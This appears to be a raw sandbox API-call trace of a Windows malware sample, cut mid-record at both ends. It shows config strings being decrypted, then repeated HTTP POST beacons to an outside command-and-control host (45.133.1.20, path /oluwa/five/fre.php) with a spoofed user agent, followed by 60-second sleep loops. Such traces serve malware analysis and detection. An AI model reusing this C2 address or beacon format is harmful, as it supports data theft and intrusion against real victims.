(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0222.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.504] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0222.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.505] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0222.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.506] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0222.506] GetProcessHeap () returned 0x6a0000 [0222.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0222.506] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0222.506] GetProcessHeap () returned 0x6a0000 [0222.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0222.507] GetProcessHeap () returned 0x6a0000 [0222.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0222.507] GetProcessHeap () returned 0x6a0000 [0222.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0222.507] GetProcessHeap () returned 0x6a0000 [0222.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0222.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.509] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.519] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0222.527] GetProcessHeap () returned 0x6a0000 [0222.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0222.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.529] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0222.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.530] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.531] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.531] GetProcessHeap () returned 0x6a0000 [0222.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0222.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.560] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0222.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.562] CryptDestroyKey (hKey=0x6ad060) returned 1 [0222.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.563] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0222.563] GetProcessHeap () returned 0x6a0000 [0222.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0222.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.564] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0222.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.565] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0222.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.567] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0222.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.568] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0222.568] GetProcessHeap () returned 0x6a0000 [0222.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0222.568] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0222.568] GetProcessHeap () returned 0x6a0000 [0222.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0222.568] socket (af=2, type=1, protocol=6) returned 0x67c [0222.569] connect (s=0x67c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0222.594] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0222.595] GetProcessHeap () returned 0x6a0000 [0222.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0222.595] GetProcessHeap () returned 0x6a0000 [0222.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9718 [0222.596] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0222.597] wvsprintfA (in: param_1=0x6d9718, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0222.597] GetProcessHeap () returned 0x6a0000 [0222.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0222.597] GetProcessHeap () returned 0x6a0000 [0222.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0222.598] GetProcessHeap () returned 0x6a0000 [0222.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0222.598] GetProcessHeap () returned 0x6a0000 [0222.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9718 [0222.599] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0222.600] wvsprintfA (in: param_1=0x6d9718, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0222.600] GetProcessHeap () returned 0x6a0000 [0222.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0222.600] GetProcessHeap () returned 0x6a0000 [0222.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0222.601] send (s=0x67c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0222.602] send (s=0x67c, buf=0x6bb998*, len=159, flags=0) returned 159 [0222.602] GetProcessHeap () returned 0x6a0000 [0222.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c5718 [0222.602] recv (in: s=0x67c, buf=0x6c5718, len=4048, flags=0 | out: buf=0x6c5718*) returned 204 [0222.926] GetProcessHeap () returned 0x6a0000 [0222.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0222.928] GetProcessHeap () returned 0x6a0000 [0222.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0222.928] GetProcessHeap () returned 0x6a0000 [0222.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0222.929] GetProcessHeap () returned 0x6a0000 [0222.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0222.930] closesocket (s=0x67c) returned 0 [0222.931] GetProcessHeap () returned 0x6a0000 [0222.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0222.931] GetProcessHeap () returned 0x6a0000 [0222.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0222.932] GetProcessHeap () returned 0x6a0000 [0222.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0222.932] GetProcessHeap () returned 0x6a0000 [0222.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0222.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c5718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x91c) returned 0x67c [0222.934] Sleep (dwMilliseconds=0xea60) [0222.936] GetProcessHeap () returned 0x6a0000 [0222.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0222.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.937] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.949] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0222.962] GetProcessHeap () returned 0x6a0000 [0222.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c6840 [0222.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.963] CryptImportKey (in: hProv=0x6beca0, pbData=0x6c6840, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0222.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.965] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.966] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.966] GetProcessHeap () returned 0x6a0000 [0222.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6840 | out: hHeap=0x6a0000) returned 1 [0222.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.970] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0222.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.974] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0222.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.975] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0222.975] GetProcessHeap () returned 0x6a0000 [0222.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0222.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.977] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0222.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.978] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0222.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.979] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0222.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.980] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0222.980] GetProcessHeap () returned 0x6a0000 [0222.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0222.982] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0222.982] GetProcessHeap () returned 0x6a0000 [0222.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0222.983] GetProcessHeap () returned 0x6a0000 [0222.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0222.983] GetProcessHeap () returned 0x6a0000 [0222.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0222.984] GetProcessHeap () returned 0x6a0000 [0222.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0222.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.985] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.022] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0223.041] GetProcessHeap () returned 0x6a0000 [0223.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0223.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.042] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0223.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.043] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.044] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.044] GetProcessHeap () returned 0x6a0000 [0223.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0223.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.051] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0223.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.053] CryptDestroyKey (hKey=0x6ad020) returned 1 [0223.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.055] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0223.055] GetProcessHeap () returned 0x6a0000 [0223.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0223.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.056] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0223.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.063] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0223.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.064] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0223.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.065] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0223.065] GetProcessHeap () returned 0x6a0000 [0223.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0223.065] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0223.065] GetProcessHeap () returned 0x6a0000 [0223.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0223.066] socket (af=2, type=1, protocol=6) returned 0x680 [0223.067] connect (s=0x680, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0223.092] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0223.092] GetProcessHeap () returned 0x6a0000 [0223.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0223.093] GetProcessHeap () returned 0x6a0000 [0223.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9718 [0223.093] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0223.094] wvsprintfA (in: param_1=0x6d9718, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0223.094] GetProcessHeap () returned 0x6a0000 [0223.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0223.094] GetProcessHeap () returned 0x6a0000 [0223.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0223.095] GetProcessHeap () returned 0x6a0000 [0223.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0223.095] GetProcessHeap () returned 0x6a0000 [0223.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9718 [0223.096] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0223.097] wvsprintfA (in: param_1=0x6d9718, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0223.097] GetProcessHeap () returned 0x6a0000 [0223.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0223.097] GetProcessHeap () returned 0x6a0000 [0223.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0223.098] send (s=0x680, buf=0x6b5c98*, len=242, flags=0) returned 242 [0223.099] send (s=0x680, buf=0x6bb998*, len=159, flags=0) returned 159 [0223.099] GetProcessHeap () returned 0x6a0000 [0223.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0223.099] recv (in: s=0x680, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0223.172] GetProcessHeap () returned 0x6a0000 [0223.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0223.172] GetProcessHeap () returned 0x6a0000 [0223.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0223.173] GetProcessHeap () returned 0x6a0000 [0223.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0223.173] GetProcessHeap () returned 0x6a0000 [0223.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0223.173] closesocket (s=0x680) returned 0 [0223.175] GetProcessHeap () returned 0x6a0000 [0223.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0223.175] GetProcessHeap () returned 0x6a0000 [0223.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0223.176] GetProcessHeap () returned 0x6a0000 [0223.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0223.177] GetProcessHeap () returned 0x6a0000 [0223.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0223.178] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4ac) returned 0x680 [0223.192] Sleep (dwMilliseconds=0xea60) [0223.194] GetProcessHeap () returned 0x6a0000 [0223.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0223.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.195] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0223.210] GetProcessHeap () returned 0x6a0000 [0223.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0223.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.219] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0223.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.219] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.220] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.221] GetProcessHeap () returned 0x6a0000 [0223.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0223.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.222] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0223.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.225] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0223.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.226] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0223.226] GetProcessHeap () returned 0x6a0000 [0223.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0223.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.227] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0223.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.228] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0223.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.229] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0223.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.230] StrStrA 